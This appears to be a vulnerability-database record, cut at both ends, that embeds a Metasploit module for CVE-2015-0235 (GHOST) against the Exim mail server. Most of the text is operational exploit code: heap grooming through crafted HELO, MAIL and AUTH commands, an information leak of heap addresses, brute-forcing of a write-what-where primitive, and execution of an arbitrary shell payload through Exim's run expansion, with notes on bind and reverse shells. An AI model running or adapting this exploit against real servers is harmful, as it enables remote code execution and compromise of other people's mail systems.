\"\", \"0\", @sender[:hostaddr8], \"\", 11*1024+13-1 + heap_shift) \nsmtp_recv(250) \n \nsmtp_send(\"HELO \", \"\", \"0\", @sender[:hostaddr8], \"\", 3*1024+13-1) \nsmtp_recv(250) \n \nsmtp_send(\"HELO \", \"\", \"0\", @sender[:hostaddr8], \"\", 3*1024+16+13-1) \nsmtp_recv(250) \n \nsmtp_send(\"HELO \", \"\", \"0\", @sender[:hostaddr8], \"\", 8*1024+16+13-1) \nsmtp_recv(250) \n \nsmtp_send(\"HELO \", \"\", \"0\", @sender[:hostaddr8], \"\", 5*1024+16+13-1) \nsmtp_recv(250) \n \n# overflow (3 bytes) gethostbyname's buffer, and \n# overwrite its next_chunk's size field with 0x003?31 \n# ^ 
last_digit \nsmtp_send(\"HELO \", \"\", \"0\", \".1#{last_digit}\", \"\", 12*1024+3-1 + heap_shift-MIN_HEAP_SHIFT) \nbegin # ^ 0x30 | PREV_INUSE \nsmtp_recv(HELO_CODES) \n \nsmtp_send(\"RSET\") \nsmtp_recv(250) \n \nsmtp_send(\"RCPT TO:\", \"\", method(:rand_text_alpha), \"\\x7F\", \"\", 15*1024) \nsmtp_recv(503, 'sender not yet given') \n \nsmtp_send(\"\", \"BAD1 \", method(:rand_text_alpha), \"\\x7F\\x7F\\x7F\\x7F\", \"\", 10*1024-16-1 + write_offset) \nsmtp_recv(500, '\\A500 unrecognized command\\r\\n\\z') \n \nsmtp_send(\"BAD2 \", \"\", method(:rand_text_alpha), \"\\x7F\", \"\", 15*1024) \nsmtp_recv(500, '\\A500 unrecognized command\\r\\n\\z') \n \nsmtp_send(\"DATA\") \nreply = smtp_recv(503) \n \nlines = reply[:lines] \nfail if lines.size <= 3 \nfail if lines[+0] != \"503-All RCPT commands were rejected with this error:\\r\\n\" \nfail if lines[-2] != \"503-valid RCPT command must precede DATA\\r\\n\" \nfail if lines[-1] != \"503 Too many syntax or protocol errors\\r\\n\" \n \n# if leaked_addr contains LF, reverse smtp_respond()'s multiline splitting \n# (the \"while (isspace(*msg)) msg++;\" loop can't be easily reversed, \n# but happens with lower probability) \n \nerror = lines[+1..-3].join(\"\") \nerror.sub!(/\\A503-/mn, \"\") \nerror.sub!(/\\r\\n\\z/mn, \"\") \nerror.gsub!(/\\r\\n503-/mn, \"\\n\") \nreturn error \n \nrescue \nreturn nil \nend \n \nensure \nsmtp_disconnect \nend \n \ndef code_execution \nprint_status(\"Trying code execution...\") \n \n# can't \"${run{/bin/sh -c 'exec /bin/sh -i <&#{b} >&0 2>&0'}} \" anymore: \n# DW/26 Set FD_CLOEXEC on SMTP sockets after forking in the daemon, to ensure \n# that rogue child processes cannot use them. \n \nfail_with(\"codeexec\", \"encoded payload\") if payload.raw != payload.encoded \nfail_with(\"codeexec\", \"invalid payload\") if payload.raw.empty? or payload.raw.count(\"^\\x20-\\x7E\").nonzero? 
\n# Exim processes our run-ACL with expand_string() first (hence the [\\$\\{\\}\\\\] escapes), \n# and transport_set_up_command(), string_dequote() next (hence the [\\\"\\\\] escapes). \nencoded = payload.raw.gsub(/[\\\"\\\\]/, '\\\\\\\\\\\\&').gsub(/[\\$\\{\\}\\\\]/, '\\\\\\\\\\\\&') \n# setsid because of Exim's \"killpg(pid, SIGKILL);\" after \"alarm(60);\" \ncommand = '${run{/usr/bin/env setsid /bin/sh -c \"' + encoded + '\"}}' \nprint_debug(command) \n \n# don't try to execute commands directly, try a very simple ACL first, \n# to distinguish between exploitation-problems and shellcode-problems \n \nacldrop = \"drop message=\" \nmessage = rand_text_alpha(command.length - acldrop.length) \nacldrop += message \n \nmax_rand_offset = (@leaked[:arch] == ARCH_X86 ? 32 : 64) \nmax_heap_addr = @leaked[:addr] \nmin_heap_addr = nil \nsurvived = nil \n \n# we later fill log_buffer and big_buffer with alpha chars, \n# which creates a safe-zone at the beginning of the heap, \n# where we can't possibly crash during our brute-force \n \n# 4, because 3 copies of sender_helo_name, and step_len; \n# start big, but refine little by little in case \n# we crash because we overwrite important data \n \nhelo_len = (LOG_BUFFER_SIZE + BIG_BUFFER_SIZE) / 4 \nloop do \n \nsender_helo_name = \"A\" * helo_len \naddress = sprintf(\"[%s]:%d\", @sender[:hostaddr], 65535) \n \n# the 3 copies of sender_helo_name, allocated by \n# host_build_sender_fullhost() in POOL_PERM memory \n \nhelo_ip_size = ALIGNMENT + \nsender_helo_name[+1..-2].length \n \nsender_fullhost_size = ALIGNMENT + \nsprintf(\"%s (%s) %s\", @sender[:hostname], sender_helo_name, address).length \n \nsender_rcvhost_size = ALIGNMENT + ((@sender[:ident] == nil) ? 
\nsprintf(\"%s (%s helo=%s)\", @sender[:hostname], address, sender_helo_name) : \nsprintf(\"%s\\n\\t(%s helo=%s ident=%s)\", @sender[:hostname], address, sender_helo_name, @sender[:ident]) \n).length \n \n# fit completely into the safe-zone \nstep_len = (LOG_BUFFER_SIZE + BIG_BUFFER_SIZE) - \n(max_rand_offset + helo_ip_size + sender_fullhost_size + sender_rcvhost_size) \nloop do \n \n# inside smtp_cmd_buffer (we later fill smtp_cmd_buffer and smtp_data_buffer \n# with alpha chars, which creates another safe-zone at the end of the heap) \nheap_addr = max_heap_addr \nloop do \n \n# try harder the first time around: we obtain better \n# heap boundaries, and we usually hit our ACL faster \n \n(min_heap_addr ? 1 : 2).times do \n \n# try the same heap_addr several times, but with different random offsets, \n# in case we crash because our hijacked storeblock's length field is too small \n# (we don't control what's stored at heap_addr) \n \nrand_offset = rand(max_rand_offset) \nprint_debug(\"#{{ helo: helo_len, step: step_len, addr: heap_addr.to_s(16), offset: rand_offset }}\") \nreply = try_code_execution(helo_len, acldrop, heap_addr + rand_offset) \nprint_debug(\"#{{ reply: reply }}\") if reply \n \nif reply and \nreply[:code] == \"550\" and \n# detect the parsed ACL, not the \"still in text form\" ACL (with \"=\") \nreply[:lines].join(\"\").delete(\"^=A-Za-z\") =~ /(\\A|[^=])#{message}/mn \nprint_good(\"Brute-force SUCCESS\") \nprint_good(\"Please wait for reply...\") \n# execute command this time, not acldrop \nreply = try_code_execution(helo_len, command, heap_addr + rand_offset) \nprint_debug(\"#{{ reply: reply }}\") \nreturn handler \nend \n \nif not min_heap_addr \nif reply \nfail_with(\"codeexec\", \"no min_heap_addr\") if (max_heap_addr - heap_addr) >= MAX_HEAP_SIZE \nsurvived = heap_addr \nelse \nif ((survived ? 
survived : max_heap_addr) - heap_addr) >= MIN_HEAP_SIZE \n# survived should point to our safe-zone at the beginning of the heap \nfail_with(\"codeexec\", \"never survived\") if not survived \nprint_good \"Brute-forced min_heap_addr: #{survived.to_s(16)}\" \nmin_heap_addr = survived \nend \nend \nend \nend \n \nheap_addr -= step_len \nbreak if min_heap_addr and heap_addr < min_heap_addr \nend \n \nbreak if step_len < 1024 \nstep_len /= 2 \nend \n \nhelo_len /= 2 \nbreak if helo_len < 1024 \n# ^ otherwise the 3 copies of sender_helo_name will \n# fit into the current_block of POOL_PERM memory \nend \nfail_with(\"codeexec\", \"Brute-force FAILURE\") \nend \n \n# our write-what-where primitive \ndef try_code_execution(len, what, where) \nfail_with(\"codeexec\", \"#{what.length} >= #{len}\") if what.length >= len \nfail_with(\"codeexec\", \"#{where} < 0\") if where < 0 \n \nx86 = (@leaked[:arch] == ARCH_X86) \nmin_heap_shift = (x86 ? 512 : 768) # at least request2size(sizeof(FILE)) \nheap_shift = min_heap_shift + rand(1024 - min_heap_shift) \nlast_digit = 1 + rand(9) \n \nsmtp_connect \n \n# fill smtp_cmd_buffer, smtp_data_buffer, and big_buffer with alpha chars \nsmtp_send(\"MAIL FROM:\", \"\", method(:rand_text_alpha), \"<#{rand_text_alpha_upper(8)}>\", \"\", BIG_BUFFER_SIZE - \n\"501 : sender address must contain a domain\\r\\n\\0\".length) \nsmtp_recv(501, 'sender address must contain a domain') \n \nsmtp_send(\"RSET\") \nsmtp_recv(250) \n \n# bulletproof Heap Feng Shui; the hard part is avoiding: \n# \"Too many syntax or protocol errors\" (3) \n# \"Too many unrecognized commands\" (3) \n# \"Too many nonmail commands\" (10) \n \n# / 5, because \"\\x7F\" is non-print, and: \n# ss = store_get(length + nonprintcount * 4 + 1); \nsmtp_send(\"BAD1 \", \"\", \"\\x7F\", \"\", \"\", (19*1024 + heap_shift) / 5) \nsmtp_recv(500, '\\A500 unrecognized command\\r\\n\\z') \n \nsmtp_send(\"HELO \", \"\", \"0\", @sender[:hostaddr8], \"\", 5*1024+13-1) \nsmtp_recv(250) \n 
\nsmtp_send(\"HELO \", \"\", \"0\", @sender[:hostaddr8], \"\", 3*1024+13-1) \nsmtp_recv(250) \n \nsmtp_send(\"BAD2 \", \"\", \"\\x7F\", \"\", \"\", (13*1024 + 128) / 5) \nsmtp_recv(500, '\\A500 unrecognized command\\r\\n\\z') \n \nsmtp_send(\"HELO \", \"\", \"0\", @sender[:hostaddr8], \"\", 3*1024+16+13-1) \nsmtp_recv(250) \n \n# overflow (3 bytes) gethostbyname's buffer, and \n# overwrite its next_chunk's size field with 0x003?31 \n# ^ last_digit \nsmtp_send(\"EHLO \", \"\", \"0\", \".1#{last_digit}\", \"\", 5*1024+64+3-1) \nsmtp_recv(HELO_CODES) # ^ 0x30 | PREV_INUSE \n \n# auth_xtextdecode() is the only way to overwrite the beginning of a \n# current_block of memory (the \"storeblock\" structure) with arbitrary data \n# (so that our hijacked \"next\" pointer can contain NUL, CR, LF characters). \n# this shapes the rest of our exploit: we overwrite the beginning of the \n# current_block of POOL_PERM memory with the current_block of POOL_MAIN \n# memory (allocated by auth_xtextdecode()). \n \nauth_prefix = rand_text_alpha(x86 ? 11264 : 11280) \n(x86 ? 
4 : 8).times { |i| auth_prefix += sprintf(\"+%02x\", (where >> (i*8)) & 255) } \nauth_prefix += \".\" \n \n# also fill log_buffer with alpha chars \nsmtp_send(\"MAIL FROM:<> AUTH=\", auth_prefix, method(:rand_text_alpha), \"+\", \"\", 0x3030) \nsmtp_recv(501, 'invalid data for AUTH') \n \nsmtp_send(\"HELO \", \"[1:2:3:4:5:6:7:8%eth0:\", \" \", \"#{what}]\", \"\", len) \nbegin \nreply = smtp_recv(ANY_CODE) \nreturn reply if reply[:code] !~ /#{HELO_CODES}/ \nreturn reply if reply[:code] != \"250\" and reply[:lines].first !~ /argument does not match calling host/ \n \nsmtp_send(\"MAIL FROM:<>\") \nreply = smtp_recv(ANY_CODE) \nreturn reply if reply[:code] != \"250\" \n \nsmtp_send(\"RCPT TO:<postmaster>\") \nreply = smtp_recv \nreturn reply \n \nrescue \nreturn nil \nend \n \nensure \nsmtp_disconnect \nend \n \nDIGITS = '([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])' \nDOT = '[.]' \n \ndef smtp_connect(exploiting = true) \nfail_with(\"smtp_connect\", \"sock isn't nil\") if sock \n \nconnect \nfail_with(\"smtp_connect\", \"sock is nil\") if not sock \n@smtp_state = :recv \n \n# Receiving the banner (but we don't really need to check it) \nsmtp_recv(220) \nreturn if not exploiting \n \nsender_host_address = datastore['SENDER_HOST_ADDRESS'] \nif sender_host_address !~ /\\A#{DIGITS}#{DOT}#{DIGITS}#{DOT}#{DIGITS}#{DOT}#{DIGITS}\\z/ \nfail_with(\"smtp_connect\", \"bad SENDER_HOST_ADDRESS (nil)\") if sender_host_address.nil? 
\nfail_with(\"smtp_connect\", \"bad SENDER_HOST_ADDRESS (not in IPv4 dotted-decimal notation)\") \nend \nsender_host_address_octal = \"0\" + $1.to_i.to_s(8) + \".#{$2}.#{$3}.#{$4}\" \n \n# turn helo_seen on (enable the MAIL command) \n# call smtp_verify_helo() (force fopen() and small malloc()s) \n# call host_find_byname() (force gethostbyname's initial 1024-byte malloc()) \nsmtp_send(\"HELO #{sender_host_address_octal}\") \nreply = smtp_recv(HELO_CODES) \n \nif reply[:code] != \"250\" \nfail_with(\"smtp_connect\", \"not Exim?\") if reply[:lines].first !~ /argument does not match calling host/ \nfail_with(\"smtp_connect\", \"bad SENDER_HOST_ADDRESS (helo_verify_hosts)\") \nend \n \nif reply[:lines].first =~ /\\A250 (\\S*) Hello (.*) \\[(\\S*)\\]\\r\\n\\z/mn \nfail_with(\"smtp_connect\", \"bad SENDER_HOST_ADDRESS (helo_try_verify_hosts)\") if sender_host_address != $3 \nsmtp_active_hostname = $1 \nsender_host_name = $2 \n \nif sender_host_name =~ /\\A(.*) at (\\S*)\\z/mn \nsender_host_name = $2 \nsender_ident = $1 \nelse \nsender_ident = nil \nend \nfail_with(\"smtp_connect\", \"bad SENDER_HOST_ADDRESS (no FCrDNS)\") if sender_host_name == sender_host_address_octal \n \nelse \n# can't double-check sender_host_address here, so only for advanced users \nfail_with(\"smtp_connect\", \"user-supplied EHLO greeting\") unless datastore['FORCE_EXPLOIT'] \n# worst-case scenario \nsmtp_active_hostname = \"A\" * NS_MAXDNAME \nsender_host_name = \"A\" * NS_MAXDNAME \nsender_ident = \"A\" * 127 * 4 # sender_ident = string_printing(string_copyn(p, 127)); \nend \n \n_sender = @sender \n@sender = { \nhostaddr: sender_host_address, \nhostaddr8: sender_host_address_octal, \nhostname: sender_host_name, \nident: sender_ident, \n__smtp_active_hostname: smtp_active_hostname \n} \nfail_with(\"smtp_connect\", \"sender changed\") if _sender and _sender != @sender \n \n# avoid a future pathological case by forcing it now: \n# \"Do NOT free the first successor, if our current block has less 
than 256 bytes left.\" \nsmtp_send(\"MAIL FROM:\", \"<\", method(:rand_text_alpha), \">\", \"\", STOREPOOL_MIN_SIZE + 16) \nsmtp_recv(501, 'sender address must contain a domain') \n \nsmtp_send(\"RSET\") \nsmtp_recv(250, 'Reset OK') \nend \n \ndef smtp_send(prefix, arg_prefix = nil, arg_pattern = nil, arg_suffix = nil, suffix = nil, arg_length = nil) \nfail_with(\"smtp_send\", \"state is #{@smtp_state}\") if @smtp_state != :send \n@smtp_state = :sending \n \nif not arg_pattern \nfail_with(\"smtp_send\", \"prefix is nil\") if not prefix \nfail_with(\"smtp_send\", \"param isn't nil\") if arg_prefix or arg_suffix or suffix or arg_length \ncommand = prefix \n \nelse \nfail_with(\"smtp_send\", \"param is nil\") unless prefix and arg_prefix and arg_suffix and suffix and arg_length \nlength = arg_length - arg_prefix.length - arg_suffix.length \nfail_with(\"smtp_send\", \"len is #{length}\") if length <= 0 \nargument = arg_prefix \ncase arg_pattern \nwhen String \nargument += arg_pattern * (length / arg_pattern.length) \nargument += arg_pattern[0, length % arg_pattern.length] \nwhen Method \nargument += arg_pattern.call(length) \nend \nargument += arg_suffix \nfail_with(\"smtp_send\", \"arglen is #{argument.length}, not #{arg_length}\") if argument.length != arg_length \ncommand = prefix + argument + suffix \nend \n \nfail_with(\"smtp_send\", \"invalid char in cmd\") if command.count(\"^\\x20-\\x7F\") > 0 \nfail_with(\"smtp_send\", \"cmdlen is #{command.length}\") if command.length > SMTP_CMD_BUFFER_SIZE \ncommand += \"\\n\" # RFC says CRLF, but squeeze as many chars as possible in smtp_cmd_buffer \n \n# the following loop works around a bug in the put() method: \n# \"while (send_idx < send_len)\" should be \"while (send_idx < buf.length)\" \n# (or send_idx and/or send_len could be removed altogether, like here) \n \nwhile command and not command.empty? 
\nnum_sent = sock.put(command) \nfail_with(\"smtp_send\", \"sent is #{num_sent}\") if num_sent <= 0 \nfail_with(\"smtp_send\", \"sent is #{num_sent}, greater than #{command.length}\") if num_sent > command.length \ncommand = command[num_sent..-1] \nend \n \n@smtp_state = :recv \nend \n \ndef smtp_recv(expected_code = nil, expected_data = nil) \nfail_with(\"smtp_recv\", \"state is #{@smtp_state}\") if @smtp_state != :recv \n@smtp_state = :recving \n \nfailure = catch(:failure) do \n \n# parse SMTP replies very carefully (the information \n# leak injects arbitrary data into multiline replies) \n \ndata = \"\" \nwhile data !~ /(\\A|\\r\\n)[0-9]{3}[ ].*\\r\\n\\z/mn \nbegin \nmore_data = sock.get_once \nrescue \nthrow(:failure, \"Caught #{$!.class}: #{$!.message}\") \nend \nthrow(:failure, \"no more data\") if more_data.nil? \nthrow(:failure, \"no more data\") if more_data.empty? \ndata += more_data \nend \n \nthrow(:failure, \"malformed reply (count)\") if data.count(\"\\0\") > 0 \nlines = data.scan(/(?:\\A|\\r\\n)[0-9]{3}[ -].*?(?=\\r\\n(?=[0-9]{3}[ -]|\\z))/mn) \nthrow(:failure, \"malformed reply (empty)\") if lines.empty? \n \ncode = nil \nlines.size.times do |i| \nlines[i].sub!(/\\A\\r\\n/mn, \"\") \nlines[i] += \"\\r\\n\" \n \nif i == 0 \ncode = lines[i][0,3] \nthrow(:failure, \"bad code\") if code !~ /\\A[0-9]{3}\\z/mn \nif expected_code and code !~ /\\A(#{expected_code})\\z/mn \nthrow(:failure, \"unexpected #{code}, expected #{expected_code}\") \nend \nend \n \nline_begins_with = lines[i][0,4] \nline_should_begin_with = code + (i == lines.size-1 ? 
\" \" : \"-\") \n \nif line_begins_with != line_should_begin_with \nthrow(:failure, \"line begins with #{line_begins_with}, \" \\ \n\"should begin with #{line_should_begin_with}\") \nend \nend \n \nthrow(:failure, \"malformed reply (join)\") if lines.join(\"\") != data \nif expected_data and data !~ /#{expected_data}/mn \nthrow(:failure, \"unexpected data\") \nend \n \nreply = { code: code, lines: lines } \n@smtp_state = :send \nreturn reply \nend \n \nfail_with(\"smtp_recv\", \"#{failure}\") if expected_code \nreturn nil \nend \n \ndef smtp_disconnect \ndisconnect if sock \nfail_with(\"smtp_disconnect\", \"sock isn't nil\") if sock \n@smtp_state = :disconnected \nend \nend \n`\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/130974/exim_gethostbyname_bof.rb.txt"}], "exploitdb": [{"lastseen": "2016-02-04T03:28:33", "bulletinFamily": "exploit", "description": "Exim GHOST (glibc gethostbyname) Buffer Overflow. CVE-2015-0235. Remote exploit for linux platform", "modified": "2015-03-18T00:00:00", "published": "2015-03-18T00:00:00", "id": "EDB-ID:36421", "href": "https://www.exploit-db.com/exploits/36421/", "type": "exploitdb", "title": "Exim GHOST glibc gethostbyname Buffer Overflow", "sourceData": "##\r\n# This module requires Metasploit: http://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit4 < Msf::Exploit::Remote\r\n Rank = GreatRanking\r\n\r\n include Msf::Exploit::Remote::Tcp\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'Exim GHOST (glibc gethostbyname) Buffer Overflow',\r\n 'Description' => %q(\r\n This module remotely exploits CVE-2015-0235 (a.k.a. GHOST, a heap-based\r\n buffer overflow in the GNU C Library's gethostbyname functions) on x86\r\n and x86_64 GNU/Linux systems that run the Exim mail server. 
Technical\r\n information about the exploitation can be found in the original GHOST\r\n advisory, and in the source code of this module.\r\n ------------------------------------------------------------------------\r\n SERVER-SIDE REQUIREMENTS (Exim)\r\n ------------------------------------------------------------------------\r\n The remote system must use a vulnerable version of the GNU C Library:\r\n the first exploitable version is glibc-2.6, the last exploitable version\r\n is glibc-2.17; older versions might be exploitable too, but this module\r\n depends on the newer versions' fd_nextsize (a member of the malloc_chunk\r\n structure) to remotely obtain the address of Exim's smtp_cmd_buffer in\r\n the heap.\r\n ------------------------------------------------------------------------\r\n The remote system must run the Exim mail server: the first exploitable\r\n version is exim-4.77; older versions might be exploitable too, but this\r\n module depends on the newer versions' 16-KB smtp_cmd_buffer to reliably\r\n set up the heap as described in the GHOST advisory.\r\n ------------------------------------------------------------------------\r\n The remote Exim mail server must be configured to perform extra security\r\n checks against its SMTP clients: either the helo_try_verify_hosts or the\r\n helo_verify_hosts option must be enabled; the \"verify = helo\" ACL might\r\n be exploitable too, but is unpredictable and therefore not supported by\r\n this module.\r\n ------------------------------------------------------------------------\r\n CLIENT-SIDE REQUIREMENTS (Metasploit)\r\n ------------------------------------------------------------------------\r\n This module's \"exploit\" method requires the SENDER_HOST_ADDRESS option\r\n to be set to the IPv4 address of the SMTP client (Metasploit), as seen\r\n by the SMTP server (Exim); additionally, this IPv4 address must have\r\n both forward and reverse DNS entries that match each other\r\n (Forward-Confirmed reverse 
DNS).\r\n ------------------------------------------------------------------------\r\n The remote Exim server might be exploitable even if the Metasploit\r\n client has no FCrDNS, but this module depends on Exim's sender_host_name\r\n variable to be set in order to reliably control the state of the remote\r\n heap.\r\n ------------------------------------------------------------------------\r\n TROUBLESHOOTING\r\n ------------------------------------------------------------------------\r\n \"bad SENDER_HOST_ADDRESS (nil)\" failure: the SENDER_HOST_ADDRESS option\r\n was not specified.\r\n ------------------------------------------------------------------------\r\n \"bad SENDER_HOST_ADDRESS (not in IPv4 dotted-decimal notation)\" failure:\r\n the SENDER_HOST_ADDRESS option was specified, but not in IPv4\r\n dotted-decimal notation.\r\n ------------------------------------------------------------------------\r\n \"bad SENDER_HOST_ADDRESS (helo_verify_hosts)\" or\r\n \"bad SENDER_HOST_ADDRESS (helo_try_verify_hosts)\" failure: the\r\n SENDER_HOST_ADDRESS option does not match the IPv4 address of the SMTP\r\n client (Metasploit), as seen by the SMTP server (Exim).\r\n ------------------------------------------------------------------------\r\n \"bad SENDER_HOST_ADDRESS (no FCrDNS)\" failure: the IPv4 address of the\r\n SMTP client (Metasploit) has no Forward-Confirmed reverse DNS.\r\n ------------------------------------------------------------------------\r\n \"not vuln? old glibc? (no leaked_arch)\" failure: the remote Exim server\r\n is either not vulnerable, or not exploitable (glibc versions older than\r\n glibc-2.6 have no fd_nextsize member in their malloc_chunk structure).\r\n ------------------------------------------------------------------------\r\n \"NUL, CR, LF in addr? 
(no leaked_addr)\" failure: Exim's heap address\r\n contains bad characters (NUL, CR, LF) and was therefore mangled during\r\n the information leak; this exploit is able to reconstruct most of these\r\n addresses, but not all (worst-case probability is ~1/85, but could be\r\n further improved).\r\n ------------------------------------------------------------------------\r\n \"Brute-force SUCCESS\" followed by a nil reply, but no shell: the remote\r\n Unix command was executed, but spawned a bind-shell or a reverse-shell\r\n that failed to connect (maybe because of a firewall, or a NAT, etc).\r\n ------------------------------------------------------------------------\r\n \"Brute-force SUCCESS\" followed by a non-nil reply, and no shell: the\r\n remote Unix command was executed, but failed to spawn the shell (maybe\r\n because the setsid command doesn't exist, or awk isn't gawk, or netcat\r\n doesn't support the -6 or -e option, or telnet doesn't support the -z\r\n option, etc).\r\n ------------------------------------------------------------------------\r\n Comments and questions are welcome!\r\n ),\r\n 'Author' => ['Qualys, Inc. 
<qsa[at]qualys.com>'],\r\n 'License' => BSD_LICENSE,\r\n 'References' => [\r\n ['CVE', '2015-0235'],\r\n ['US-CERT-VU', '967332'],\r\n ['OSVDB', '117579'],\r\n ['BID', '72325'],\r\n ['URL', 'https://www.qualys.com/research/security-advisories/GHOST-CVE-2015-0235.txt']\r\n ],\r\n 'DisclosureDate' => 'Jan 27 2015',\r\n 'Privileged' => false, # uid=101(Debian-exim) gid=103(Debian-exim) groups=103(Debian-exim)\r\n 'Platform' => 'unix', # actually 'linux', but we execute a unix-command payload\r\n 'Arch' => ARCH_CMD, # actually [ARCH_X86, ARCH_X86_64], but ^\r\n 'Payload' => {\r\n 'Space' => 255, # the shorter the payload, the higher the probability of code execution\r\n 'BadChars' => \"\", # we encode the payload ourselves, because ^\r\n 'DisableNops' => true,\r\n 'ActiveTimeout' => 24*60*60 # we may need more than 150 s to execute our bind-shell\r\n },\r\n 'Targets' => [['Automatic', {}]],\r\n 'DefaultTarget' => 0\r\n ))\r\n\r\n register_options([\r\n Opt::RPORT(25),\r\n OptAddress.new('SENDER_HOST_ADDRESS', [false,\r\n 'The IPv4 address of the SMTP client (Metasploit), as seen by the SMTP server (Exim)', nil])\r\n ], self.class)\r\n\r\n register_advanced_options([\r\n OptBool.new('I_KNOW_WHAT_I_AM_DOING', [false, 'Please read the source code for details', nil])\r\n ], self.class)\r\n end\r\n\r\n def check\r\n # for now, no information about the vulnerable state of the target\r\n check_code = Exploit::CheckCode::Unknown\r\n\r\n begin\r\n # not exploiting, just checking\r\n smtp_connect(false)\r\n\r\n # malloc()ate gethostbyname's buffer, and\r\n # make sure its next_chunk isn't the top chunk\r\n\r\n 9.times do\r\n smtp_send(\"HELO \", \"\", \"0\", \"\", \"\", 1024+16-1+0)\r\n smtp_recv(HELO_CODES)\r\n end\r\n\r\n # overflow (4 bytes) gethostbyname's buffer, and\r\n # overwrite its next_chunk's size field with 0x00303030\r\n\r\n smtp_send(\"HELO \", \"\", \"0\", \"\", \"\", 1024+16-1+4)\r\n # from now on, an exception means vulnerable\r\n check_code = 
Exploit::CheckCode::Vulnerable\r\n # raise an exception if no valid SMTP reply\r\n reply = smtp_recv(ANY_CODE)\r\n # can't determine vulnerable state if smtp_verify_helo() isn't called\r\n return Exploit::CheckCode::Unknown if reply[:code] !~ /#{HELO_CODES}/\r\n\r\n # realloc()ate gethostbyname's buffer, and\r\n # crash (old glibc) or abort (new glibc)\r\n # on the overwritten size field\r\n\r\n smtp_send(\"HELO \", \"\", \"0\", \"\", \"\", 2048-16-1+4)\r\n # raise an exception if no valid SMTP reply\r\n reply = smtp_recv(ANY_CODE)\r\n # can't determine vulnerable state if smtp_verify_helo() isn't called\r\n return Exploit::CheckCode::Unknown if reply[:code] !~ /#{HELO_CODES}/\r\n # a vulnerable target should've crashed by now\r\n check_code = Exploit::CheckCode::Safe\r\n\r\n rescue\r\n peer = \"#{rhost}:#{rport}\"\r\n vprint_debug(\"#{peer} - Caught #{$!.class}: #{$!.message}\")\r\n\r\n ensure\r\n smtp_disconnect\r\n end\r\n\r\n return check_code\r\n end\r\n\r\n def exploit\r\n unless datastore['I_KNOW_WHAT_I_AM_DOING']\r\n print_status(\"Checking if target is vulnerable...\")\r\n fail_with(\"exploit\", \"Vulnerability check failed.\") if check != Exploit::CheckCode::Vulnerable\r\n print_good(\"Target is vulnerable.\")\r\n end\r\n information_leak\r\n code_execution\r\n end\r\n\r\n private\r\n\r\n HELO_CODES = '250|451|550'\r\n ANY_CODE = '[0-9]{3}'\r\n\r\n MIN_HEAP_SHIFT = 80\r\n MIN_HEAP_SIZE = 128 * 1024\r\n MAX_HEAP_SIZE = 1024 * 1024\r\n\r\n # Exim\r\n ALIGNMENT = 8\r\n STORE_BLOCK_SIZE = 8192\r\n STOREPOOL_MIN_SIZE = 256\r\n\r\n LOG_BUFFER_SIZE = 8192\r\n BIG_BUFFER_SIZE = 16384\r\n\r\n SMTP_CMD_BUFFER_SIZE = 16384\r\n IN_BUFFER_SIZE = 8192\r\n\r\n # GNU C Library\r\n PREV_INUSE = 0x1\r\n NS_MAXDNAME = 1025\r\n\r\n # Linux\r\n MMAP_MIN_ADDR = 65536\r\n\r\n def information_leak\r\n print_status(\"Trying information leak...\")\r\n leaked_arch = nil\r\n leaked_addr = []\r\n\r\n # try different heap_shift values, in case Exim's heap address contains\r\n # bad 
chars (NUL, CR, LF) and was mangled during the information leak;\r\n # we'll keep the longest one (the least likely to have been truncated)\r\n\r\n 16.times do\r\n done = catch(:another_heap_shift) do\r\n heap_shift = MIN_HEAP_SHIFT + (rand(1024) & ~15)\r\n print_debug(\"#{{ heap_shift: heap_shift }}\")\r\n\r\n # write the malloc_chunk header at increasing offsets (8-byte step),\r\n # until we overwrite the \"503 sender not yet given\" error message\r\n\r\n 128.step(256, 8) do |write_offset|\r\n error = try_information_leak(heap_shift, write_offset)\r\n print_debug(\"#{{ write_offset: write_offset, error: error }}\")\r\n throw(:another_heap_shift) if not error\r\n next if error == \"503 sender not yet given\"\r\n\r\n # try a few more offsets (allows us to double-check things,\r\n # and distinguish between 32-bit and 64-bit machines)\r\n\r\n error = [error]\r\n 1.upto(5) do |i|\r\n error[i] = try_information_leak(heap_shift, write_offset + i*8)\r\n throw(:another_heap_shift) if not error[i]\r\n end\r\n print_debug(\"#{{ error: error }}\")\r\n\r\n _leaked_arch = leaked_arch\r\n if (error[0] == error[1]) and (error[0].empty? or (error[0].unpack('C')[0] & 7) == 0) and # fd_nextsize\r\n (error[2] == error[3]) and (error[2].empty? or (error[2].unpack('C')[0] & 7) == 0) and # fd\r\n (error[4] =~ /\\A503 send[^e].?\\z/mn) and ((error[4].unpack('C*')[8] & 15) == PREV_INUSE) and # size\r\n (error[5] == \"177\") # the last \\x7F of our BAD1 command, encoded as \\\\177 by string_printing()\r\n leaked_arch = ARCH_X86_64\r\n\r\n elsif (error[0].empty? or (error[0].unpack('C')[0] & 3) == 0) and # fd_nextsize\r\n (error[1].empty? 
or (error[1].unpack('C')[0] & 3) == 0) and # fd\r\n (error[2] =~ /\\A503 [^s].?\\z/mn) and ((error[2].unpack('C*')[4] & 7) == PREV_INUSE) and # size\r\n (error[3] == \"177\") # the last \\x7F of our BAD1 command, encoded as \\\\177 by string_printing()\r\n leaked_arch = ARCH_X86\r\n\r\n else\r\n throw(:another_heap_shift)\r\n end\r\n print_debug(\"#{{ leaked_arch: leaked_arch }}\")\r\n fail_with(\"infoleak\", \"arch changed\") if _leaked_arch and _leaked_arch != leaked_arch\r\n\r\n # try different large-bins: most of them should be empty,\r\n # so keep the most frequent fd_nextsize address\r\n # (a pointer to the malloc_chunk itself)\r\n\r\n count = Hash.new(0)\r\n 0.upto(9) do |last_digit|\r\n error = try_information_leak(heap_shift, write_offset, last_digit)\r\n next if not error or error.length < 2 # heap_shift can fix the 2 least significant NUL bytes\r\n next if (error.unpack('C')[0] & (leaked_arch == ARCH_X86 ? 7 : 15)) != 0 # MALLOC_ALIGN_MASK\r\n count[error] += 1\r\n end\r\n print_debug(\"#{{ count: count }}\")\r\n throw(:another_heap_shift) if count.empty?\r\n\r\n # convert count to a nested array of [key, value] arrays and sort it\r\n error_count = count.sort { |a, b| b[1] 